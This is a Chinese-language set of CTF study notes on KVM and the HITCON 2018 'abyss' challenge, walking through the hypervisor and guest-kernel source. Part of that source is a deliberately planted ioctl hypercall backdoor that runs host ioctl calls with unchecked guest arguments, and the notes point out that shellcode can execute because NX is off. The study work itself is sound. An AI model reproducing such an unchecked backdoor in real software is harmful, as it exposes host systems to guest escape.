kvm + guest kernel

KVM 基础知识

kvm是一个内核模块,它实现了一个/dev/kvm的字符设备来与用户进行交互,通过调用一系列ioctl函数可以实现qemukvm之间的切换。

KVM结构体

KVM结构体在 KVM的系统架构中代表一个具体的虚拟机,当通过 VM_CREATE_KVM 指令创建一个新的 KVM结构体对象。

struct kvm结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
struct kvm {
spinlock_t mmu_lock;
struct mutex slots_lock;
struct mm_struct *mm; /* userspace tied to this vm */
struct kvm_memslots *memslots;
struct srcu_struct srcu;
#ifdef CONFIG_KVM_APIC_ARCHITECTURE
u32 bsp_vcpu_id;
#endif
struct kvm_vcpu *vcpus[KVM_MAX_VCPUS];
atomic_t online_vcpus;
int last_boosted_vcpu;
struct list_head vm_list;
struct mutex lock;
struct kvm_io_bus *buses[KVM_NR_BUSES];
#ifdef CONFIG_HAVE_KVM_EVENTFD
struct {
spinlock_t lock;
struct list_head items;
struct list_head resampler_list;
struct mutex resampler_lock;
} irqfds;
struct list_head ioeventfds;
#endif
struct kvm_vm_stat stat;
struct kvm_arch arch;
atomic_t users_count;
#ifdef KVM_COALESCED_MMIO_PAGE_OFFSET
struct kvm_coalesced_mmio_ring *coalesced_mmio_ring;
spinlock_t ring_lock;
struct list_head coalesced_zones;
#endif

struct mutex irq_lock;
#ifdef CONFIG_HAVE_KVM_IRQCHIP
/*
* Update side is protected by irq_lock and,
* if configured, irqfds.lock.
*/
struct kvm_irq_routing_table __rcu *irq_routing;
struct hlist_head mask_notifier_list;
struct hlist_head irq_ack_notifier_list;
#endif

#if defined(CONFIG_MMU_NOTIFIER) && defined(KVM_ARCH_WANT_MMU_NOTIFIER)
struct mmu_notifier mmu_notifier;
unsigned long mmu_notifier_seq;
long mmu_notifier_count;
#endif
long tlbs_dirty;
struct list_head devices;
};

KVM结构体对象包含了 vCPU、内存、APICIRQMMUEvent时间管理等信息,该结构体中的信息主要在 KVM虚拟机内部使用,用于跟踪虚拟机的状态。

在 KVM中,连接了如下几个重要的结构体成员,他们对虚拟机的运行有重要作用。

  • struct kvm_memslots *memslots;
    KVM虚拟机所分配到的内存slot,以数组形式存储这些slot的地址信息。
    由于客户机物理地址不能直接用于宿主机物理 MMU 进行寻址,所以需要把客户机物理地址转换成宿主机虚拟地址 (Host Virtual Address, HVA),为此,KVM 用一个 kvm_memory_slot 数据结构来记录每一个地址区间的映射关系,此数据结构包含了对应此映射区间的起始客户机页帧号 (Guest Frame Number, GFN),映射的内存页数目以及起始宿主机虚拟地址。于是 KVM 就可以实现对客户机物理地址到宿主机虚拟地址之间的转换,也即首先根据客户机物理地址找到对应的映射区间,然后根据此客户机物理地址在此映射区间的偏移量就可以得到其对应的宿主机虚拟地址。进而再通过宿主机的页表也可实现客户机物理地址到宿主机物理地址之间的转换,也即 GPA 到 HPA 的转换。

  • struct kvm_vcpu *vcpus[KVM_MAX_VCPUS];
    KVM虚拟机中包含的vCPU结构体,一个虚拟机CPU对应一个vCPU结构体。

  • struct kvm_io_bus *buses[KVM_NR_BUSES];
    KVM虚拟机中的I/O总线,一条总线对应一个kvm_io_bus结构体,如ISA总线、PCI总线。

  • struct kvm_vm_stat stat;
    KVM虚拟机中的页表、MMU等运行时的状态信息。

  • struct kvm_arch arch;
    KVM的软件arch方面所需要的一些参数。

KVM初始化过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
// 获取 kvm 句柄
kvm = open("/dev/kvm", O_RDWR | O_CLOEXEC);
if (kvm == -1)
err(1, "/dev/kvm");

// 确保是正确的 API 版本
ret = ioctl(kvm, KVM_GET_API_VERSION, NULL);
if (ret == -1)
err(1, "KVM_GET_API_VERSION");
if (ret != 12)
errx(1, "KVM_GET_API_VERSION %d, expected 12", ret);

// 创建一虚拟机
vmfd = ioctl(kvm, KVM_CREATE_VM, (unsigned long)0);
if (vmfd == -1)
err(1, "KVM_CREATE_VM");

// 为这个虚拟机申请内存,并将代码(镜像)加载到虚拟机内存中
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (!mem)
err(1, "allocating guest memory");
memcpy(mem, code, sizeof(code));

// 为什么从 0x1000 开始呢,因为页表空间的前4K是留给页表目录
struct kvm_userspace_memory_region region = {
.slot = 0,
.guest_phys_addr = 0x1000,
.memory_size = 0x1000,
.userspace_addr = (uint64_t)mem,
};
// 设置 KVM 的内存区域
ret = ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, &region);
if (ret == -1)
err(1, "KVM_SET_USER_MEMORY_REGION");

// 创建虚拟CPU
vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, (unsigned long)0);
if (vcpufd == -1)
err(1, "KVM_CREATE_VCPU");

// 获取 KVM 运行时结构的大小
ret = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, NULL);
if (ret == -1)
err(1, "KVM_GET_VCPU_MMAP_SIZE");
mmap_size = ret;
if (mmap_size < sizeof(*run))
errx(1, "KVM_GET_VCPU_MMAP_SIZE unexpectedly small");
// 将 kvm run 与 vcpu 做关联,这样能够获取到kvm的运行时信息
run = mmap(NULL, mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpufd, 0);
if (!run)
err(1, "mmap vcpu");

// 获取特殊寄存器
ret = ioctl(vcpufd, KVM_GET_SREGS, &sregs);
if (ret == -1)
err(1, "KVM_GET_SREGS");
// 设置代码段为从地址0处开始,我们的代码被加载到了0x0000的起始位置
sregs.cs.base = 0;
sregs.cs.selector = 0;
// KVM_SET_SREGS 设置特殊寄存器
ret = ioctl(vcpufd, KVM_SET_SREGS, &sregs);
if (ret == -1)
err(1, "KVM_SET_SREGS");

// 设置代码的入口地址,相当于32位main函数的地址,这里16位汇编都是由0x1000处开始。
// 如果是正式的镜像,那么rip的值应该是类似引导扇区加载进来的指令
struct kvm_regs regs = {
.rip = 0x1000,
.rax = 2, // 设置 ax 寄存器初始值为 2
.rbx = 2, // 同理
.rflags = 0x2, // 初始化flags寄存器,x86架构下需要设置,否则会粗错
};
ret = ioctl(vcpufd, KVM_SET_REGS, &regs);
if (ret == -1)
err(1, "KVM_SET_REGS");

// 开始运行虚拟机,如果是qemu-kvm,会用一个线程来执行这个vCPU,并加载指令
while (1) {
// 开始运行虚拟机
ret = ioctl(vcpufd, KVM_RUN, NULL);
if (ret == -1){
//错误检测
}
}

源码分析

参考网上有的 Hitcon 2018 abyss 题目的源码,整体分析一下这类题目的大致逻辑。

整个题目由3个binary,hypervisor.elfkernel.binuser.elf组成:

hypervisor.elf是一个利用KVM API来做虚拟化的程序,它会加载一个小型的内核kernel.bin,这个kernel就只实现了内存管理和中断处理的功能,提供了loader启动和libc加载需要的一些常见syscall,然后解析ELF启动一个用户态程序。这里直接加载ld.so.2来装载用户态程序user.elf

user.elf就是一个标准的x86-64 ELF文件,也可以直接在host上启动。kernel.bin在处理syscall时,将一些与IO有关的例如read/write等通过 I/O Port (CPUin/out指令) 交给hypervisor来处理。例如open这个syscallkernel在做检查之后,直接通过hypercall传给hypervisor处理,然后hypervisor会在host上打开一个文件,并将其fd做一个映射返回给kernel. 所以实际上VM内做的open是可以打开host的文件的。

hypervisor

首先是 main函数,主要重点有 kvm_initcopy_argv和 execute函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("Usage: %s kernel.bin <static-elf> [args...] ", argv[0]);
exit(EXIT_FAILURE);
}
alarm(60);
uint8_t *code;
size_t len;
//读取用户代码
read_file(argv[1], &code, &len);
if(len > MAX_KERNEL_SIZE)
error("Kernel size exceeded, %p > MAX_KERNEL_SIZE(%p). ",
(void*) len,
(void*) MAX_KERNEL_SIZE);
//初始化kvm虚拟机
VM* vm = kvm_init(code, len);
copy_argv(vm, argc - 2, &argv[2]);
execute(vm);
}

kvm_init

kvm_init函数的整体逻辑和上面说的 KVM初始过程差不多,主要实现了初始化和创建 kvm,创建了KVM内存和CPU, 然后拷贝了用户代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
VM* kvm_init(uint8_t code[], size_t len) {
//获取kvm句柄
int kvmfd = open("/dev/kvm", O_RDONLY | O_CLOEXEC);
if(kvmfd < 0) pexit("open(/dev/kvm)");
//检查 kvm 版本
int api_ver = ioctl(kvmfd, KVM_GET_API_VERSION, 0);
if(api_ver < 0) pexit("KVM_GET_API_VERSION");
if(api_ver != KVM_API_VERSION) {
error("Got KVM api version %d, expected %d ",
api_ver, KVM_API_VERSION);
}
//创建kvm虚拟机
int vmfd = ioctl(kvmfd, KVM_CREATE_VM, 0);
if(vmfd < 0) pexit("ioctl(KVM_CREATE_VM)");
//为KVM虚拟机申请内存
void *mem = mmap(0,
MEM_SIZE,
PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS,
-1, 0);
if(mem == NULL) pexit("mmap(MEM_SIZE)");
size_t entry = 0;
//拷贝用户态代码到虚拟机内存
memcpy((void*) mem + entry, code, len);
//创建内存结构体
struct kvm_userspace_memory_region region = {
.slot = 0,
.flags = 0,
.guest_phys_addr = 0,
.memory_size = MEM_SIZE,
.userspace_addr = (size_t) mem
};
//设置 KVM 的内存区域
if(ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, &region) < 0) {
pexit("ioctl(KVM_SET_USER_MEMORY_REGION)");
}
//创建 VCPU
int vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, 0);
if(vcpufd < 0) pexit("ioctl(KVM_CREATE_VCPU)");
//获取 KVM 运行时结构的大小
size_t vcpu_mmap_size = ioctl(kvmfd, KVM_GET_VCPU_MMAP_SIZE, NULL);
//将 kvm run 与 vcpu 做关联,这样能够获取到kvm的运行时信息
struct kvm_run *run = (struct kvm_run*) mmap(0,
vcpu_mmap_size,
PROT_READ | PROT_WRITE,
MAP_SHARED,
vcpufd, 0);
//设置虚拟机结构体
VM *vm = (VM*) malloc(sizeof(VM));
*vm = (struct VM){
.mem = mem,
.mem_size = MEM_SIZE,
.vcpufd = vcpufd,
.run = run
};
//设置特殊寄存器
setup_regs(vm, entry);
//设置段页
setup_long_mode(vm);

return vm;
}

setup_regs

主要设置了 KVM运行时的寄存器,包括代码运行点,内存大小等

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/* set rip = entry point
* set rsp = MAX_KERNEL_SIZE + KERNEL_STACK_SIZE (the max address can be used)
*
* set rdi = PS_LIMIT (start of free (unpaging) physical pages)
* set rsi = MEM_SIZE - rdi (total length of free pages)
* Kernel could use rdi and rsi to initalize its memory allocator.
*/
void setup_regs(VM *vm, size_t entry) {
struct kvm_regs regs;
//KVM_GET_SREGS 获得特殊寄存器
if(ioctl(vm->vcpufd, KVM_GET_REGS, &regs) < 0) pexit("ioctl(KVM_GET_REGS)");
//初始化寄存器
regs.rip = entry; //代码开始运行点
regs.rsp = MAX_KERNEL_SIZE + KERNEL_STACK_SIZE; /* temporary stack */
regs.rdi = PS_LIMIT; /* start of free pages */
regs.rsi = MEM_SIZE - regs.rdi; /* total length of free pages */
regs.rflags = 0x2;
//KVM_SET_SREGS 设置特殊寄存器
if(ioctl(vm->vcpufd, KVM_SET_REGS, &regs) < 0) pexit("ioctl(KVM_SET_REGS");
}

设置寄存器的值时,有一个很重要的点是我们要关注的,即是否设置了 ERREF寄存器,如果这个寄存器的值为 0x800(1<<11),那么意味着 hypervisor开了 NEX即数据执行保护,这对于我们后续的 EXP的编写影响很大。

此处我们可以看到未设置 ERREF寄存器,也就是未 开启 NEX,我们后续可以直接执行 shellcode.

setup_long_mode

主要是设置了段页的各项属性,包括pml4、pdp、pd、cr3等指定页表映射等关系的内存和寄存器。这一块页表映射还有点不太懂。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/* Maps:
* 0 ~ 0x200000 -> 0 ~ 0x200000
*/
void setup_paging(VM *vm) {
struct kvm_sregs sregs;
if(ioctl(vm->vcpufd, KVM_GET_SREGS, &sregs) < 0) pexit("ioctl(KVM_GET_SREGS)");
//获取pml4页面偏移及起始地址
uint64_t pml4_addr = MAX_KERNEL_SIZE;
uint64_t *pml4 = (void*) (vm->mem + pml4_addr);
//获取pdp偏移及起始地址
uint64_t pdp_addr = pml4_addr + 0x1000;
uint64_t *pdp = (void*) (vm->mem + pdp_addr);
//获取pd偏移及起始地址
uint64_t pd_addr = pdp_addr + 0x1000;
uint64_t *pd = (void*) (vm->mem + pd_addr);
//pml4第一项存储pdp,Pdp第一项存储pd,pd 存储了PDE64_PS(2k)的页面,并设置了页面属性
pml4[0] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pdp_addr;
pdp[0] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pd_addr;
pd[0] = PDE64_PRESENT | PDE64_RW | PDE64_PS; /* kernel only, no PED64_USER */
//设置crs等寄存器,cr3是页目录基址寄存器,保存页目录表的物理地址
sregs.cr3 = pml4_addr;
sregs.cr4 = CR4_PAE;
sregs.cr4 |= CR4_OSFXSR | CR4_OSXMMEXCPT; /* enable SSE instruction */
sregs.cr0 = CR0_PE | CR0_MP | CR0_ET | CR0_NE | CR0_WP | CR0_AM | CR0_PG;
sregs.efer = EFER_LME | EFER_LMA;
sregs.efer |= EFER_SCE; /* enable syscall instruction */
//设置寄存器
if(ioctl(vm->vcpufd, KVM_SET_SREGS, &sregs) < 0) pexit("ioctl(KVM_SET_SREGS)");
}

void setup_seg_regs(VM *vm) {
struct kvm_sregs sregs;
//
if(ioctl(vm->vcpufd, KVM_GET_SREGS, &sregs) < 0) pexit("ioctl(KVM_GET_SREGS)");
//设置段属性
struct kvm_segment seg = {
.base = 0,
.limit = 0xffffffff,
.selector = 1 << 3,
.present = 1,
.type = 0xb, /* Code segment */
.dpl = 0, /* Kernel: level 0 */
.db = 0,
.s = 1,
.l = 1, /* long mode */
.g = 1
};
sregs.cs = seg;
seg.type = 0x3; /* Data segment */
seg.selector = 2 << 3;
sregs.ds = sregs.es = sregs.fs = sregs.gs = sregs.ss = seg;
if(ioctl(vm->vcpufd, KVM_SET_SREGS, &sregs) < 0) pexit("ioctl(KVM_SET_SREGS)");
}

/*
* Switching to long mode usually done by kernel.
* We put the task in hypervisor because we want our KVM be able to execute
* normal x86-64 assembled code as well. Which let us easier to debug and test.
*
*/
void setup_long_mode(VM *vm) {
//设置内存页面属性
setup_paging(vm);
//设置段属性
setup_seg_regs(vm);
}

copy_argv

copy_argv函数将一些参数拷贝到内核栈上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* copy argv onto kernel's stack */
void copy_argv(VM* vm, int argc, char *argv[]) {
struct kvm_regs regs;
if(ioctl(vm->vcpufd, KVM_GET_REGS, &regs) < 0) pexit("ioctl(KVM_GET_REGS)");
char *sp = (char*)vm->mem + regs.rsp;
char **copy = (char**) malloc(argc * sizeof(char*));
#define STACK_ALLOC(sp, len) ({ sp -= len; sp; })
for(int i = argc - 1; i >= 0; i--) {
int len = strlen(argv[i]) + 1;
copy[i] = STACK_ALLOC(sp, len);
memcpy(copy[i], argv[i], len);
}
sp = (char*) ((uint64_t) sp & -0x10);
/* push argv */
*(uint64_t*) STACK_ALLOC(sp, sizeof(char*)) = 0;
for(int i = argc - 1; i >= 0; i--)
*(uint64_t*) STACK_ALLOC(sp, sizeof(char*)) = copy[i] - (char*)vm->mem;
/* push argc */
*(uint64_t*) STACK_ALLOC(sp, sizeof(uint64_t)) = argc;
free(copy);
#undef STACK_ALLOC
regs.rsp = sp - (char*) vm->mem;
if(ioctl(vm->vcpufd, KVM_SET_REGS, &regs) < 0) pexit("ioctl(KVM_SET_REGS)");
}

execute

最后会调用execute函数,我们可以看到开始循环运行KVM虚拟机,如果发生了中断会进入中断处理流程。其中我们重点关注 KVM_EXIT_IO,该流程会根据 io.port去调用 hp_handler来处理,如果处理失败才会退出虚拟机。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
void __attribute__((noreturn)) execute(VM* vm) {
while(1) {
//运行虚拟机
ioctl(vm->vcpufd, KVM_RUN, NULL);
dump_regs(vm->vcpufd);
#ifdef DEBUG
struct kvm_translation trans;
trans.linear_address = 0x00007ffffffec4b0;//0x00007ffff7df722f;
if(ioctl(vm->vcpufd, KVM_TRANSLATE, &trans) < 0) pexit("ioctl(KVM_TRANSLATE)");
debug("addr: %#llx, valid: %d, writable: %d, usermode: %d ",
trans.physical_address,
trans.valid,
trans.writeable,
trans.usermode);
uint64_t *ptr = (uint64_t*) ((char*)vm->mem + trans.physical_address);
if(trans.valid)
printf("0x%016llx 0x%016llx 0x%016llx 0x%016llx ", ptr[0], ptr[1], ptr[2], ptr[3]);
#endif
//处理中断
switch (vm->run->exit_reason) {
//处理退出
case KVM_EXIT_HLT:
fprintf(stderr, "KVM_EXIT_HLT ");
exit(0);
//处理IO中断
case KVM_EXIT_IO:
if(vm->run->io.port & HP_NR_MARK) {
//处理IO
if(hp_handler(vm->run->io.port, vm) < 0) error("Hypercall failed ");
}
else error("Unhandled I/O port: 0x%x ", vm->run->io.port);
break;
case KVM_EXIT_FAIL_ENTRY:
error("KVM_EXIT_FAIL_ENTRY: hardware_entry_failure_reason = 0x%llx ",
vm->run->fail_entry.hardware_entry_failure_reason);
case KVM_EXIT_INTERNAL_ERROR:
error("KVM_EXIT_INTERNAL_ERROR: suberror = 0x%x ",
vm->run->internal.suberror);
case KVM_EXIT_SHUTDOWN:
error("KVM_EXIT_SHUTDOWN ");
default:
error("Unhandled reason: %d ", vm->run->exit_reason);
}
}
}

hp_handle

hp_handle定义了hypervisor接受内核发出的 IO中断时的处理函数,可以看到主要处理了 openread、 write、 lseek、 fclose、 fstat、 exit、 acces、 ioctl、 panic等函数。而其中 ioctl函数为对参数做检查,可以在host上以任意参数来调用一个ioctl函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
int hp_handler(uint16_t nr, VM* vm) {
switch(nr) {
#define handle(f) case NR_HP_##f: return hp_handle_##f(vm)

handle(open);
handle(read);
handle(write);
handle(lseek);
handle(close);
handle(fstat);
handle(exit);
handle(access);
handle(ioctl);
handle(panic);

#undef handle
default:
return -ENOSYS;
}
}

#define UNUSED_VAR 0xdeadffffu

#define FETCH_U32 (*(uint32_t*)((uint8_t*)vm->run + vm->run->io.data_offset))

#define PROCESS if(vm->run->io.direction == KVM_EXIT_IO_OUT)
#define THEN_RETURN(var) else {
if(var == UNUSED_VAR) return -1;
FETCH_U32 = var;
var = UNUSED_VAR;
}

#define CHECK_OOB(var) assert(0 <= (var) && (var) < vm->mem_size)

#define MEM_AT(offset) (
CHECK_OOB(offset),
(uint8_t*) vm->mem + (uint64_t) offset
)

typedef struct fd_handle {
int real_fd;
int opening;
} fd_handle;

#define MAX_FD 255

static fd_handle fd_map[MAX_FD + 1];

static inline void MAY_INIT_FD_MAP() {
static int fd_map_init = 0;
if(!fd_map_init) {
fd_map_init = 1;
fd_map[0].real_fd = 0; fd_map[0].opening = 1;
fd_map[1].real_fd = 1; fd_map[1].opening = 1;
fd_map[2].real_fd = 2; fd_map[2].opening = 1;
for(int i = 3; i <= MAX_FD; i++)
fd_map[i].opening = 0;
}
}

static int hp_handle_open(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const char *filename = (char*) MEM_AT(offset);
uint32_t end = offset + strlen(filename);
CHECK_OOB(end);

/* puts(filename); */
MAY_INIT_FD_MAP();
int min_fd;
for(min_fd = 0; min_fd <= MAX_FD; min_fd++)
if(fd_map[min_fd].opening == 0) break;
if(min_fd > MAX_FD) ret = -ENFILE;
else {
int fd = open(filename, O_RDONLY, 0);
if(fd < 0) ret = -errno;
else {
fd_map[min_fd].real_fd = fd;
fd_map[min_fd].opening = 1;
ret = min_fd;
}
}
} THEN_RETURN(ret);
return 0;
}

#define BADFD(fd) (fd < 0 || fd > MAX_FD || fd_map[fd].opening == 0)
#define PROCESS_ON_FD(work) do {
MAY_INIT_FD_MAP();
if(BADFD(fd)) ret = -EBADF;
else {
ret = work;
if(ret < 0) ret = -errno;
}
} while(0)

static int handle_rw(VM* vm, typeof(read) fptr) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint64_t *kbuf = (uint64_t*) MEM_AT(offset);
int fd = (int) kbuf[0];
uint64_t paddr = kbuf[1];
uint64_t nbytes = kbuf[2];

PROCESS_ON_FD(fptr(fd_map[fd].real_fd, MEM_AT(paddr), nbytes));

} THEN_RETURN(ret);
return 0;
}

static int hp_handle_read(VM* vm) {
return handle_rw(vm, read);
}

static int hp_handle_write(VM* vm) {
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wincompatible-pointer-types"
/* Justification: here just cast write into typeof(read) */
return handle_rw(vm, write);
#pragma GCC diagnostic pop
}

static int hp_handle_lseek(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint32_t *kbuf = (uint32_t*) MEM_AT(offset);
int fd = kbuf[0];
uint32_t off = kbuf[1];
int whence = kbuf[2];

PROCESS_ON_FD(lseek(fd_map[fd].real_fd, off, whence));

} THEN_RETURN(ret);
return 0;
}

static inline int do_close(struct fd_handle *h) {
h->opening = 0;
return close(h->real_fd);
}

static int hp_handle_close(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
int fd = FETCH_U32;

PROCESS_ON_FD(do_close(&fd_map[fd]));

} THEN_RETURN(ret);
return 0;
}

static int hp_handle_fstat(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint64_t *kbuf = (uint64_t*) MEM_AT(offset);
int fd = kbuf[0];
uint64_t paddr = kbuf[1];

PROCESS_ON_FD(fstat(fd_map[fd].real_fd, (struct stat*) MEM_AT(paddr)));

} THEN_RETURN(ret);
return 0;
}

static int hp_handle_access(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint32_t *kbuf = (uint32_t*) MEM_AT(offset);
uint32_t paddr = kbuf[0];
int mode = kbuf[1];

ret = access((const char*) MEM_AT(paddr), mode);
} THEN_RETURN(ret);
return 0;
}

/* I'm sorry.. this is a backdoor.. */
//未做任何检查,可以在host上以任意参数来调用一个ioctl
static int hp_handle_ioctl(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint64_t *kbuf = (uint64_t*) MEM_AT(offset);
int fd = kbuf[0];
unsigned long request = kbuf[1];
uint32_t paddr = kbuf[2];
if(paddr == 0) ret = ioctl(fd, request, 0);
else ret = ioctl(fd, request, MEM_AT(paddr));
if(ret < 0) ret = -errno;
} THEN_RETURN(ret);
return 0;
}

static int hp_handle_exit(VM *vm) {
int status = FETCH_U32;
fprintf(stderr, "+++ exited with %d +++ ", status);
exit(0);
}

static int hp_handle_panic(VM *vm) {
uint32_t offset = FETCH_U32;
fprintf(stderr, "[e[31mPANICe[0m] %s ", MEM_AT(offset));
exit(1);
return -1;
}

kernel

首先是 entry.s,取出参数,然后调用 kernel_main函数,此外就会一直循环 hlt

1
2
3
4
5
6
7
8
9
10
.globl _start, hlt
.extern kernel_main
.intel_syntax noprefix
_start:
mov rdx, [rsp] /* argc */
lea rcx, [rsp + 8] /* argv */
call kernel_main
hlt:
hlt
jmp hlt

kernel_main

先初始化了页表,然后初始化了内存分配器,根据源码得到 KERNEL_BASE_OFFSET=0x8000000000,然后注册了系统调用,最终切换用户。

1
2
3
4
5
6
7
8
int kernel_main(void* addr, uint64_t len, uint64_t argc, char *argv[]) {
init_pagetable();
/* new paging enabled! */
init_allocator((void*) ((uint64_t) addr | KERNEL_BASE_OFFSET), len);
if(register_syscall() != 0) return 1;
switch_user(argc, argv);
return 0;
}

init_pagetable

主要完成的也是页表映射功能,是做一个0x8000000000 ~ 0x8002000000到0 ~ 0x2000000的地址映射

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Maps
* 0x8000000000 ~ 0x8002000000 -> 0 ~ 0x2000000
*/
void init_pagetable() {
uint64_t* pml4;
asm("mov %[pml4], cr3" : [pml4]"=r"(pml4));
uint64_t* pdp = (uint64_t*) ((uint64_t) pml4 + 0x3000);
pml4[1] = PDE64_PRESENT | PDE64_RW | (uint64_t) pdp; // 0x8000000000
uint64_t* pd = (uint64_t*) ((uint64_t) pdp + 0x1000);
pdp[0] = PDE64_PRESENT | PDE64_RW | (uint64_t) pd;
for(uint64_t i = 0; i < 0x10; i++)
pd[i] = PDE64_PRESENT | PDE64_RW | PDE64_PS | (i * KERNEL_PAGING_SIZE);
}

init_allocator

设置内存分配,调用时init_allocator((const char *)(addr | 0x8000000000i64), len);。所以arena.top就是0x8000000000。现在应该可以得出结论,内存映射:0x8000000000~0x8002000000到0x0~0x2000000。

1
2
3
4
5
6
7
void init_allocator(void *addr, uint64_t len) {
if(len == 0 || (len & 0xfff) != 0) panic("kmalloc.c#init_allocator: invalid length");

arena.top = addr;
arena.top_size = len;
memset(&arena.sorted_bin, 0, sizeof(arena.sorted_bin));
}

register_syscall

使用 wrmsr写模式定义寄存器,对于WRMSR 指令,把要写入的信息存入(EDX:EAX)中,执行写指令后,即可将相应的信息存入ECX 指定的MSR 中。MSR 总体来是为了设置CPU 的工作环境和标示CPU 的工作状态,包括温度控制,性能监控等。而此部分代码,主要是注册了syscall,包括 syscall的入口等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#define MSR_STAR 0xc0000081 /* legacy mode SYSCALL target */
#define MSR_LSTAR 0xc0000082 /* long mode SYSCALL target */
#define MSR_CSTAR 0xc0000083 /* compat mode SYSCALL target */
#define MSR_SYSCALL_MASK 0xc0000084

int register_syscall() {
asm(
"xor rax, rax;"
"mov rdx, 0x00200008;"
"mov ecx, %[msr_star];"
"wrmsr;"

"mov eax, %[fmask];"
"xor rdx, rdx;"
"mov ecx, %[msr_fmask];"
"wrmsr;"

"lea rax, [rip + syscall_entry];"
"mov rdx, %[base] >> 32;"
"mov ecx, %[msr_syscall];"
"wrmsr;"
:: [msr_star]"i"(MSR_STAR),
[fmask]"i"(0x3f7fd5), [msr_fmask]"i"(MSR_SYSCALL_MASK),
[base]"i"(KERNEL_BASE_OFFSET), [msr_syscall]"i"(MSR_LSTAR)
: "rax", "rdx", "rcx");
return 0;
}

switch_user

switch_user 函数先利用 add_trans_user转到用户态,然后调用 sys_execve执行了用户态程序。

1
2
3
4
5
6
7
8
9
10
11
12
13
void switch_user(uint64_t argc, char *argv[]) {
int total_len = (argv[argc - 1] + strlen(argv[argc - 1]) + 1) - (char*) argv;
/* temporary area for putting user-accessible data */
char *s = kmalloc(total_len, MALLOC_PAGE_ALIGN);
uint64_t sp = physical(s);
add_trans_user((void*) sp, (void*) sp, PROT_RW); /* sp is page aligned */

/* copy strings and argv onto user-accessible area */
for(int i = 0; i < argc; i++)
argv[i] = (char*) (argv[i] - (char*) argv + sp);
memcpy(s, argv, total_len);
sys_execve(argv[0], (char**) sp, (char**) (sp + argc * sizeof(char*)));
}

syscall系统调用表分析

由于 Kernel 都会对 系统调用进行一些特殊处理,所以我们对各个 syscall系统函数进行分析,首先就要找到 syscall_table

首先有一个 标志函数 syscall_entry,其特点是开始和结尾进行了很长的 push操作,这可以作为我们很快找到 syscall_entry 的标志。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
syscall_entry:
mov [rip + user_stack], rsp
mov rsp, [rip + kernel_stack]
/* save non-callee saved registers */
push rdi
push rsi
push rdx
push rcx
push r8
push r9
push r10
push r11

/* the forth argument */
mov rcx, r10
call syscall_handler

pop r11
pop r10
pop r9
pop r8
pop rcx
pop rdx
pop rsi
pop rdi

mov rsp, [rip + user_stack]c
.byte 0x48
sysret

然后再进入 sycall_handler函数,可以看到这里就出现了 syscall_tabe,然后通过 swich_case 跳转。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
